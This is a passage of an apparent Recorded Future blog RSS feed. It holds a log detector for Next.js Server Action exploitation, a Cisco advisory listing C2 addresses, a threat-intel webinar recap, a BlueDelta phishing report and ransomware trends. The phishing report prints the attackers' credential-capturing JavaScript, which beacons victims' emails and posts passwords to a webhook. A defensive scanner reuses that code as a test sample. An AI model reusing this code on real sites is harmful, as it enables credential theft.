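const RSC_ERROR_MARKER = 'E{"digest"';

function parseLine(line) {
  try { return JSON.parse(line); } catch { return null; } // non-JSON lines are skipped
}

// Reasons one event looks like exploitation; an empty array means nothing to see.
function scoreEvent(ev) {
  const reasons = [];
  const method = String(ev.method || '').toUpperCase();
  const ctype = String(ev.content_type || '').toLowerCase();
  const actionId = (ev.headers || {})['next-action']; // Next.js marks Server Action calls with this header
  const multipartPost = method === 'POST' && ctype.startsWith('multipart/form-data');

  if (multipartPost && actionId && !KNOWN_ACTION_IDS.has(actionId)) {
    reasons.push('multipart POST with a Next-Action id the deployed build never shipped');
  }
  if (typeof ev.resp_prefix === 'string' && ev.resp_prefix.includes(RSC_ERROR_MARKER)) {
    reasons.push('RSC error chunk E{"digest" in the response');
  }
  return reasons;
}

// Runs scoreEvent over a batch and reports sources whose hit count reaches burstThreshold.
function detect(lines, burstThreshold = 3) {
  const hits = [];
  const perSource = new Map();
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev) continue;
    const reasons = scoreEvent(ev);
    if (reasons.length === 0) continue;
    hits.push({ src: ev.src, path: ev.path, status: ev.status, reasons });
    perSource.set(ev.src, (perSource.get(ev.src) || 0) + 1);
  }
  const bursts = [...perSource].filter(([, n]) => n >= burstThreshold).map(([src]) => src);
  return { hits, bursts };
}

// Constructed sample log: documentation IP ranges, made-up action IDs and response prefixes.
const SAMPLE_LOG = [
  // legitimate form submission to an action the build ships
  JSON.stringify({ src: '198.51.100.20', method: 'POST', path: '/contact', status: 200,
    content_type: 'multipart/form-data; boundary=----form',
    headers: { 'next-action': '7f3a1c9e2b4d6f8a0c1e3b5d7f9a2c4e6b8d0f1a' }, resp_prefix: '0:"ok"' }),
  JSON.stringify({ src: '198.51.100.20', method: 'GET', path: '/about', status: 200,
    content_type: '', headers: {}, resp_prefix: '<!DOCTYPE html>' }),
  // one source firing unknown action IDs at several paths, one answered with an error chunk
  JSON.stringify({ src: '203.0.113.7', method: 'POST', path: '/', status: 500,
    content_type: 'multipart/form-data; boundary=----x',
    headers: { 'next-action': 'deadbeef00000000000000000000000000000001' }, resp_prefix: '0:E{"digest":"3401011849"}' }),
  JSON.stringify({ src: '203.0.113.7', method: 'POST', path: '/api/health', status: 404,
    content_type: 'multipart/form-data; boundary=----x',
    headers: { 'next-action': 'deadbeef00000000000000000000000000000002' }, resp_prefix: '' }),
  JSON.stringify({ src: '203.0.113.7', method: 'POST', path: '/login', status: 500,
    content_type: 'multipart/form-data; boundary=----x',
    headers: { 'next-action': 'deadbeef00000000000000000000000000000003' }, resp_prefix: '' }),
  'proxy restart marker: not JSON, must be skipped',
];

// Stand-alone run: reports three hits and one burst source (203.0.113.7).
console.log(JSON.stringify(detect(SAMPLE_LOG), null, 2));
```

        <p>Legitimate form submissions also send multipart POSTs with a <code>Next-Action</code> header, and a genuine bug can produce a digest error, so neither signal alone is conclusive; an unknown action ID plus an error chunk from the same source, repeated across paths, is what merits a look.</p>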
        <p><strong>Exposure:</strong> ~310,500 Internet-exposed Next.js instances observed on Shodan, concentrated in the US, India, Germany, Japan, and Australia</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c78e7d8c6ef475aeadada64b85462a8f66332e7c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h3>CVE-2025-20393 | Cisco Secure Email Gateway</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by UAT-9686</p>
        <p><strong>Why this matters:</strong> Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.</p>
        <p><strong>Affected products:</strong> Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Cisco's security updates immediately</li>
          <li>Monitor Spam Quarantine web interface access logs</li>
          <li>Check for modifications to <code>/data/web/euq_webui/htdocs/index.py</code></li>
          <li>Hunt for AquaShell, AquaPurge, and AquaTunnel indicators</li>
          <li>Review outbound connections to suspicious IPs</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Practitioners Reveal What Makes Threat Intelligence Programs Mature]]></title>
            <link>https://www.recordedfuture.com/ko/blog/practitioner-insights-advancing-threat-intelligence</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/practitioner-insights-advancing-threat-intelligence</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat intelligence practitioners from Global Payments, Adobe, and Superhuman reveal how mature CTI programs transform data overload into strategic business value. Learn proven approaches to automation, cross-functional collaboration, and executive communication.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Intelligence drives better decisions.</strong> High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.</li>
          <li><strong>Maturity means efficiency.</strong> Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.</li>
          <li><strong>Information overload is the top challenge.</strong> Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.</li>
          <li><strong>AI will reshape the analyst role.</strong> While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.</li>
        </ul>
        <p>Recorded Future recently hosted two webinars to unpack key insights from the <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">2025 State of Threat Intelligence Report</a> and hear directly from customers who are putting these findings into practice.</p>
        <p>Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.</p>
        <p>But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.</p>
        <h2>Intelligence as a strategic asset</h2>
        <p>Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”</p>
        <p>Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”</p>
        <p>Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”</p>
        <h2>How threat intelligence delivers organization-wide value</h2>
        <p>Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.</p>
        <p>Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”</p>
        <p>Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”</p>
        <p>Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”</p>
        <h2>The anatomy of a mature threat intelligence program</h2>
        <p>According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.</p>
        <p>“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.</p>
        <p>Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”</p>
        <h2>Pathways to advancing maturity</h2>
        <p>Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”</p>
        <p>Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”</p>
        <h2>Top challenges for CTI teams</h2>
        <p>The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”</p>
        <p>Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.</p>
        <h2>Looking to the future of threat intelligence</h2>
        <p>When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.</p>
        <p>Watch the recordings of the <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/8812722f-c797-43e5-8959-dafb91973948">North America</a> and <a href="https://recordedfuture.ondemand.goldcast.io/on-demand/cd895838-6b18-4d3e-8d02-16287ee95642">EMEA</a> webinar sessions to learn more, and <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html?utm_id=2%5B%E2%80%A6%5Dampaign=whyrf2_stofti&amp;utm_content=landingpage_home_hero">download the 2025 State of Threat Intelligence Report</a> to see how your peers are evaluating, investing in, and operationalizing threat intelligence.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1c3dce156d3f3b159e439a8f8b07b4b731d9082a8.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GRU-Linked BlueDelta Evolves Credential Harvesting]]></title>
            <link>https://www.recordedfuture.com/ko/research/gru-linked-bluedelta-evolves-credential-harvesting</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/gru-linked-bluedelta-evolves-credential-harvesting</guid>
            <pubDate>Wed, 07 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Insikt Group reveals how GRU-linked BlueDelta evolved credential-harvesting campaigns targeting government, energy, and research organizations across Europe and Eurasia.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was September 11, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 <a href="https://www.recordedfuture.com/ko/research/bluedeltas-persistent-campaign-against-ukrnet">report</a>.</p>
        <p>Insikt Group identified BlueDelta targeting a small but distinct set of victims during its 2025 credential-harvesting activity. Targets included individuals linked to a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan. The use of Turkish-language and regionally targeted lure material suggests that BlueDelta tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect a continued interest in organizations connected to energy research, defense cooperation, and government communication networks relevant to Russian intelligence priorities.</p>
        <p>BlueDelta’s credential-harvesting pages impersonated a range of legitimate webmail and VPN services, including Microsoft Outlook Web Access (OWA), Google, and Sophos VPN portals. Each page replicated authentic login interfaces and redirected victims to legitimate websites after they submitted their credentials, thereby reducing suspicion. The campaigns relied heavily on free hosting and tunneling services, such as Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host phishing content, capture user data, and manage redirections. Several pages also incorporated legitimate PDF lure documents to enhance realism and evade automated detection.</p>
        <p>BlueDelta’s consistent abuse of legitimate internet service infrastructure demonstrates the group’s continued reliance on disposable services to host and relay credential data. These campaigns underscore the GRU’s sustained commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta expanded its credential-harvesting operations throughout 2025, deploying new campaigns themed as Microsoft Outlook Web Access (OWA), Google, and Sophos VPN login portals.</li>
          <li>The group leveraged a combination of free hosting and tunneling services, including Webhook[.]site, InfinityFree, Byet Internet Services, and ngrok, to host credential-harvesting pages and exfiltrate stolen data.</li>
          <li>Multiple campaigns incorporated legitimate PDF lure documents, such as publications from the Gulf Research Center and the EcoClimate Foundation, to increase the appearance of authenticity and bypass email security controls.</li>
          <li>BlueDelta used customized JavaScript functions to capture credentials, track victim activity, and automate redirection to legitimate websites, reducing manual setup and increasing operational efficiency.</li>
          <li>Targeted email addresses and redirection behavior suggest BlueDelta focused on researchers and institutions in Türkiye and Europe, aligning with Russia’s broader intelligence-gathering priorities.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation's Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has carried out credential-harvesting and espionage operations for more than a decade. This campaign overlaps with activity previously attributed by Insikt Group to BlueDelta, which multiple Western governments attribute with high confidence to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics companies, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on Microsoft Outlook, UKR.NET, and other webmail services, using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>Between February and September 2025, Insikt Group analyzed a series of credential-harvesting campaigns attributed to BlueDelta. These campaigns demonstrate continued refinement of BlueDelta’s spearphishing tradecraft, with the group adopting new lure themes, multi-stage redirection chains, and enhanced credential-harvesting mechanisms. Each campaign abused free hosting and tunneling services to host malicious content and relay harvested data, reflecting BlueDelta’s persistent use of low-cost, easily disposable infrastructure.</p>
        <h3>Microsoft OWA Credential Harvesting</h3>
        <p>On February 6, 2025, BlueDelta deployed a new credential-harvesting page themed as a Microsoft Outlook Web Access (OWA) login page, as shown in <strong>Figure 1</strong>.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1dd2f28cbdc733be6383fcbe909dac08761bf2bb0.png?width=750&amp;format=png&amp;optimize=medium" width="1372" height="809" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1:</strong> OWA login-themed credential-harvesting page (Source: Recorded Future)</div>
          </div>
        </div>
        <p>BlueDelta employed the link-shortening service ShortURL for the first-stage redirection, using the URL <em>hxxps://shorturl[.]at/Be4Xe</em>. The shortened link redirected victims to a second stage, which was hosted using the free API service Webhook[.]site, via the URL <em>hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7</em>. BlueDelta has regularly used Webhook[.]site for credential harvesting and phishing in recent campaigns.</p>
        <p>The initial webhook in this campaign differs from those previously reported by Insikt Group; instead of hosting the credential-harvesting page, it serves HTML that loads a PDF lure document in the victim's browser for two seconds before redirecting to a second webhook, as shown in <strong>Figure 2</strong>.</p>
        <div>
          <div>
            <div>
              <pre><code>&lt;html&gt;
  &lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
        &lt;meta name="viewport" content="width=device-width"&gt;
        &lt;meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"&gt;&lt;/object&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 2:</strong></em> <em>HTML used to display a PDF lure on the victim's browser (Source: Recorded Future)</em></p>
        <p>The PDF lure document, shown in <strong>Figure 3</strong>, is a legitimate report published by the Saudi Arabia-based think tank Gulf Research Center (GRC), entitled “Strategic and Political Implications for Israel and Iran: The Day After War.”</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1a7e9f590d762d7e489a243d9e12bcccb33d79463.png?width=750&amp;format=png&amp;optimize=medium" width="864" height="913" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Legitimate GRC PDF lure used by BlueDelta in credential harvesting (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>After the PDF lure has displayed for two seconds, the page redirects to a second webhook at <em>hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4</em>, which hosts the spoofed OWA login page shown in <strong>Figure 1</strong>. The page's structure is very similar to that of previous BlueDelta credential-harvesting pages, but the theme has been updated to represent a login page rather than a password reset page.</p>
        <p>As shown in <strong>Figure 4</strong>, BlueDelta has added a new hidden HTML form element that stores the current page's URL. The element is populated by JavaScript at page load, as shown in <strong>Figure 5</strong>, and is later used as the destination for victim data both when the page opens and when credentials are submitted. This update reduces BlueDelta's administrative burden by eliminating the need to add the exfiltration URL to each credential-harvesting page by hand.</p>
        <div>
          <div>
            <div><code>&lt;input type="hidden" id="href" name="href" role="textbox" aria-labelledby="userNameLabel" value="hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"&gt;&lt;/div&gt;</code></div>
          </div>
        </div>
        <p><em><strong>Figure 4:</strong></em> <em>Hidden HTML form element populated using the page URL at page load (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <pre><code>&lt;script&gt;
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;

var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
&lt;/script&gt;
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript used to capture the current URL, set a hidden form element, send a “page-opened” beacon, and change the displayed URL in the victim's browser (Source: Recorded Future)</em></p>
        <p>The stored URL is then used as the destination of a page-opened beacon, which collects the victim's email address from the query string parameter “<code>u=</code>” and sends it in JSON format back to the webhook. The webhook additionally captures the victim's IP address and user agent. After the page URL has been saved and the page-opened beacon sent, BlueDelta modifies the page URL to <code>/owa/</code> to imitate a legitimate OWA login page.<br /><br />When the HTML form is submitted, a JavaScript function named <code>myFunction</code> captures the entered username and password and sends them via an HTTP POST request to the hidden form element’s webhook. The page is then redirected to the GRC PDF hosted on the GRC website after a one-second delay, as shown in <strong>Figure 6</strong>.</p>
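        <p>The behaviours described above (a hidden form field that stores the page's own URL, a script that copies <code>window.location.href</code> into it, an XMLHttpRequest POST whose destination is read back out of the DOM, an e-mail pre-fill from the <code>u=</code> parameter with a page-opened beacon, and a <code>pushState</code> rewrite to <code>/owa/</code>) are each individually unremarkable but rarely co-occur on a legitimate login page. The following static scanner is an added example written for this analysis; it is not Recorded Future's or Insikt Group's tooling. It uses only the Python standard library, and the two HTML samples in it are constructed here: the first mirrors the structure of Figures 4 and 5 with a placeholder webhook URL, the second is an ordinary login form with a CSRF token.</p>

```python
"""Static heuristics for the self-addressing credential-harvesting page pattern.

Added example, not the report's own code. Standard library only. Sample pages
are constructed below; the webhook URL in SAMPLE_PAGE is a placeholder.
"""
import re
from html.parser import HTMLParser

# Legitimate request-capture services that double as zero-setup exfiltration
# endpoints. Extend from your own threat intelligence as appropriate.
REQUEST_BIN_HOSTS = ("webhook.site",)


class _Collector(HTMLParser):
    """Gathers hidden <input> elements and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.hidden_inputs = []   # attribute dicts of hidden inputs
        self.scripts = []         # bodies of inline scripts
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden_inputs.append(a)
        elif tag == "script" and "src" not in a:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # html.parser hands script bodies through handle_data unchanged
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False


def analyze_page(html: str) -> dict:
    """Return the matched heuristics, a count, and a coarse verdict."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []

    # 1. Hidden field pre-filled with a request-bin URL, or named as a URL store
    for inp in c.hidden_inputs:
        name = (inp.get("name") or inp.get("id") or "").lower()
        value = inp.get("value", "")
        if any(host in value for host in REQUEST_BIN_HOSTS):
            findings.append(f"hidden input '{name}' holds request-bin URL {value}")
        elif name in ("href", "url", "location"):
            findings.append(f"hidden input '{name}' looks like a self-URL store")

    js = "\n".join(c.scripts)
    # 2. Page copies its own URL into a form field (self-addressing endpoint)
    if re.search(r"\.value\s*=\s*window\.location\.href", js):
        findings.append("script copies window.location.href into a form field")
    # 3. POST whose destination is read back out of the DOM
    if re.search(r"\.open\(\s*['\"]POST['\"]\s*,\s*document\.getElementById\(", js):
        findings.append("XMLHttpRequest POST to a URL read from a DOM element")
    # 4. Victim e-mail pre-filled from the query string and/or page-opened beacon
    if re.search(r"\.get\(\s*['\"]u['\"]\s*\)", js) or "page_opened" in js:
        findings.append("query-string e-mail pre-fill and/or page-opened beacon")
    # 5. Address bar rewritten to an OWA-looking path without navigation
    if re.search(r"history\.pushState\([^)]*['\"]/owa/['\"]\s*\)", js):
        findings.append("history.pushState rewrites address bar to /owa/")

    return {
        "findings": findings,
        "score": len(findings),
        "verdict": "suspicious" if len(findings) >= 3 else "benign",
    }


# Constructed sample mirroring Figures 4 and 5; the UUID is a placeholder.
SAMPLE_PAGE = """
<html><body><form>
  <input type="text" id="username" name="username">
  <input type="password" id="password" name="password">
  <input type="hidden" id="href" name="href"
         value="https://webhook.site/00000000-0000-0000-0000-000000000000">
</form>
<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script></body></html>
"""

# Constructed benign login form: hidden CSRF token, no self-addressing script.
BENIGN_PAGE = """
<html><body><form method="post" action="/login">
  <input type="text" id="username" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf_token" value="constructed-token-value">
</form>
<script>document.getElementById('username').focus();</script>
</body></html>
"""

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, analyze_page(page))
```

<p>The scanner is meant for triage of pages already collected from phishing URLs or mail sandboxes, not for blocking; the individual heuristics are coarse, so the verdict is driven by their co-occurrence, and the list of request-bin hosts should be fed from current intelligence rather than the single entry shown.</p>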
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_13adafe204e74a6a3976247e1c12b0466f536b86e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[New ransomware tactics to watch out for in 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/ransomware-tactics-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/ransomware-tactics-2026</guid>
            <pubDate>Mon, 05 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Ransomware groups made less money in 2025 despite a 47% increase in attacks, driving new tactics: bundled DDoS services, insider recruitment, and gig worker exploitation. Learn the emerging trends defenders must prepare for in 2026.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.</li>
          <li>Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.</li>
          <li>Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.</li>
        </ul>
        <h2>The ransomware paradox: More attacks, less money</h2>
        <p>By most accounts, ransomware groups <a href="https://www.coveware.com/blog/2025/10/24/insider-threats-loom-while-ransom-payment-rates-plummet">made less money</a> in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to <a href="https://www.recordedfuture.com/ko/products/threat-intelligence">Recorded Future Intelligence</a>, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.</p>
        <p>For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.</p>
        <p>This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.</p>
        <h2>Trend 1: DDoS services return to the RaaS model</h2>
        <p>With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.</p>
        <p>The newly formed <a href="https://blog.talosintelligence.com/new-chaos-ransomware/">Chaos ransomware group</a> (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.</li>
        </ul>
        <h2>Trend 2: Insider recruitment attempts are accelerating</h2>
        <p>Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.</p>
        <p>The most public example came earlier this year when a ransomware group attempted to recruit a <a href="https://www.bbc.com/news/articles/c3w5n903447o">reporter at the BBC</a>. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.</li>
        </ul>
        <h2>Trend 3: Gig workers as unwitting attack vectors</h2>
        <p>According to a recent <a href="https://www.ic3.gov/CSA/2025/250523.pdf">FBI advisory</a>, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.</p>
        <p>The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.</li>
        </ul>
        <h2>Looking ahead: One big prediction for 2026</h2>
        <p>The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.</p>
        <p>Recorded Future believes that 2026 will be the first year the number of <em>new</em> ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.</p>
        <h2>The bottom line: Strengthen your ransomware defenses</h2>
        <p>Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:</p>
        <ul>
          <li><strong>Explore Recorded Future's</strong> <strong><a href="https://www.recordedfuture.com/ko/use-case/ransomware">Ransomware Mitigation Solution</a></strong> for end-to-end visibility into your ransomware exposure across the attack lifecycle.</li>
          <li><strong>Read our latest</strong> <strong><a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group® research</a></strong> on ransomware trends, threat actor TTPs, and emerging attack vectors.</li>
